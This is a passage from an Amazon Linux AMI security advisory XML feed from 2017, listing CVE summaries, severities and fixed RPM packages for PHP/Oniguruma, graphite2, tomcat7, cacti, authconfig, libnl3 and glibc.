/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9229:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg-&gt;dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.
1466746:
CVE-2017-9229 oniguruma: Invalid pointer dereference in left_adjust_char_head()
CVE-2017-9228:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it&#039;s used as an index, resulting in an out-of-bounds write memory corruption.
1466740:
CVE-2017-9228 oniguruma: Out-of-bounds heap write in bitset_set_range()
CVE-2017-9227:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching. Invalid handling of reg-&gt;dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.
1466739:
CVE-2017-9227 oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching
CVE-2017-9226:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of &#039;\\700&#039; would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.
1466736:
CVE-2017-9226 oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation
CVE-2017-9224:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
1466730:
CVE-2017-9224 oniguruma: Out-of-bounds stack read in match_at() during regular expression searching
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9224" title="" id="CVE-2017-9224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9226" title="" id="CVE-2017-9226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9227" title="" id="CVE-2017-9227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9228" title="" id="CVE-2017-9228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9229" title="" id="CVE-2017-9229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-ldap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.31" release="1.134.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.31-1.134.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.31-1.134.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.31" release="1.134.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.31-1.134.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-872</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-872: important priority package update for graphite2</title><issued date="2017-08-17 18:27:00" /><updated date="2017-08-17 22:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7778:
1461260:
CVE-2017-7778 Mozilla: Vulnerabilities in the Graphite 2 library (MFSA 2017-16)
CVE-2017-7777:
The use of uninitialized memory related to &quot;graphite2::GlyphCache::Loader::read_glyph&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to negatively impact the execution of an application using graphite2 in unknown ways.
1472225:
CVE-2017-7777 graphite2: use of uninitialized memory "graphite2::GlyphCache::Loader::read_glyph"
CVE-2017-7776:
An out of bounds read flaw related to &quot;graphite2::Silf::getClassGlyph&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to disclose potentially sensitive memory or cause an application crash.
1472223:
CVE-2017-7776 graphite2: heap-buffer-overflow read "graphite2::Silf::getClassGlyph"
CVE-2017-7775:
An assertion error has been reported in graphite2. An attacker could possibly exploit this flaw to cause an application crash.
1472221:
CVE-2017-7775 graphite2: assertion error "size() > n"
CVE-2017-7774:
An out of bounds read flaw related to &quot;graphite2::Silf::readGraphite&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to disclose potentially sensitive memory or cause an application crash.
1472219:
CVE-2017-7774 graphite2: out of bounds read "graphite2::Silf::readGraphite"
CVE-2017-7773:
A heap-based buffer overflow flaw related to &quot;lz4::decompress&quot; (src/Decompressor) has been reported in graphite2. An attacker could exploit this issue to cause a crash or, possibly, execute arbitrary code.
1472215:
CVE-2017-7773 graphite2: heap-buffer-overflow write "lz4::decompress" (src/Decompressor)
CVE-2017-7772:
A heap-based buffer overflow flaw related to &quot;lz4::decompress&quot; has been reported in graphite2. An attacker could exploit this issue to cause a crash or, possibly, execute arbitrary code.
1472213:
CVE-2017-7772 graphite2: heap-buffer-overflow write "lz4::decompress" (CVE-2017-7772)
CVE-2017-7771:
An out of bounds read flaw related to &quot;graphite2::Pass::readPass&quot; has been reported in graphite2. An attacker could possibly exploit this flaw to disclose potentially sensitive memory or cause an application crash.
1472212:
CVE-2017-7771 graphite2: out of bounds read in "graphite2::Pass::readPass"
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7771" title="" id="CVE-2017-7771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7772" title="" id="CVE-2017-7772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7773" title="" id="CVE-2017-7773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7774" title="" id="CVE-2017-7774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7775" title="" id="CVE-2017-7775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7776" title="" id="CVE-2017-7776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7777" title="" id="CVE-2017-7777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7778" title="" id="CVE-2017-7778" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphite2-devel" version="1.3.10" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-devel-1.3.10-1.7.amzn1.x86_64.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.10" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-debuginfo-1.3.10-1.7.amzn1.x86_64.rpm</filename></package><package name="graphite2" version="1.3.10" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-1.3.10-1.7.amzn1.x86_64.rpm</filename></package><package name="graphite2-devel" version="1.3.10" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-devel-1.3.10-1.7.amzn1.i686.rpm</filename></package><package name="graphite2" version="1.3.10" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-1.3.10-1.7.amzn1.i686.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.10" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-debuginfo-1.3.10-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-873</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-873: important priority package update for tomcat7</title><issued date="2017-08-17 18:30:00" /><updated date="2017-08-31 23:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7674:
The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
1480618:
CVE-2017-7674 tomcat: Vary header not added by CORS filter leading to cache poisoning
CVE-2017-5664:
A vulnerability was discovered in the error page mechanism in Tomcat&#039;s DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page.
1459158:
CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
CVE-2017-5648:
While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.
A vulnerability was discovered in tomcat. When running an untrusted application under a SecurityManager it was possible, under some circumstances, for that application to retain references to the request or response objects and thereby access and/or modify information associated with another web application.
1441223:
CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5648" title="" id="CVE-2017-5648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664" title="" id="CVE-2017-5664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7674" title="" id="CVE-2017-7674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-admin-webapps" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.79-1.28.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.79" release="1.28.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.79-1.28.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-874</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-874: important priority package update for cacti</title><issued date="2017-08-17 18:36:00" /><updated date="2017-08-31 23:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12066:
CVE-2017-12065:
CVE-2017-10970:
Cross-site scripting (XSS) vulnerability in link.php in Cacti 1.1.12 allows remote anonymous users to inject arbitrary web script or HTML via the id parameter, related to the die_html_input_error function in lib/html_validate.php
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10970" title="" id="CVE-2017-10970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12065" title="" id="CVE-2017-12065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12066" title="" id="CVE-2017-12066" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.16" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.16-1.16.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-875</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-875: medium priority package update for authconfig</title><issued date="2017-08-30 23:37:00" /><updated date="2017-09-14 22:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7488:
A flaw was found where authconfig could configure sssd in a way that treats existing and non-existing logins differently, leaking information on existence of a user. An attacker with physical or network access to the machine could enumerate users via a timing attack.
1441604:
CVE-2017-7488 authconfig: Information leak when SSSD is used for authentication against remote server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7488" title="" id="CVE-2017-7488" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="authconfig" version="6.2.8" release="30.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/authconfig-6.2.8-30.31.amzn1.x86_64.rpm</filename></package><package name="authconfig-debuginfo" version="6.2.8" release="30.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/authconfig-debuginfo-6.2.8-30.31.amzn1.x86_64.rpm</filename></package><package name="authconfig" version="6.2.8" release="30.31.amzn1" epoch="0" arch="i686"><filename>Packages/authconfig-6.2.8-30.31.amzn1.i686.rpm</filename></package><package name="authconfig-debuginfo" version="6.2.8" release="30.31.amzn1" epoch="0" arch="i686"><filename>Packages/authconfig-debuginfo-6.2.8-30.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-876</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-876: medium priority package update for libnl3</title><issued date="2017-08-30 23:38:00" /><updated date="2017-08-31 22:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-0553:
An integer overflow leading to a heap-buffer overflow was found in the libnl library. An attacker could use this flaw to cause an application compiled with libnl to crash or possibly execute arbitrary code in the context of the user running such an application.
1440788:
CVE-2017-0553 libnl: Integer overflow in nlmsg_reserve()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0553" title="" id="CVE-2017-0553" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libnl3-debuginfo" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-debuginfo-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-cli" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-cli-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-doc" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-doc-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-devel" version="3.2.28" release="4.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnl3-devel-3.2.28-4.6.amzn1.x86_64.rpm</filename></package><package name="libnl3-doc" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-doc-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3-cli" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-cli-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3-debuginfo" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-debuginfo-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3-devel" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-devel-3.2.28-4.6.amzn1.i686.rpm</filename></package><package name="libnl3" version="3.2.28" release="4.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnl3-3.2.28-4.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-877</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-877: medium priority package update for glibc</title><issued date="2017-08-31 15:52:00" /><updated date="2017-08-31 23:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8779:
A stack based buffer overflow vulnerability was found in the catopen() function. An excessively long string passed to the function could cause it to crash or, potentially, execute arbitrary code.
1300312:
CVE-2015-8779 glibc: Unbounded stack allocation in catopen function
CVE-2015-8778:
An integer overflow vulnerability was found in hcreate() and hcreate_r() functions which could result in an out-of-bounds memory access. This could lead to application crash or, potentially, arbitrary code execution.
1300303:
CVE-2015-8778 glibc: Integer overflow in hcreate and hcreate_r
CVE-2015-8777:
It was found that the dynamic loader did not sanitize the LD_POINTER_GUARD environment variable. An attacker could use this flaw to bypass the pointer guarding protection on set-user-ID or set-group-ID programs to execute arbitrary code with the permissions of the user running the application.
1260581:
CVE-2015-8777 glibc: LD_POINTER_GUARD in the environment is not sanitized
CVE-2015-8776:
It was found that out-of-range time values passed to the strftime() function could result in an out-of-bounds memory access. This could lead to application crash or, potentially, information disclosure.
1300299:
CVE-2015-8776 glibc: Segmentation fault caused by passing out-of-range data to strftime()
CVE-2014-9761:
A stack overflow vulnerability was found in nan* functions that could cause applications, which process long strings with the nan function, to crash or, potentially, execute arbitrary code.
1300310:
CVE-2014-9761 glibc: Unbounded stack allocation in nan* functions
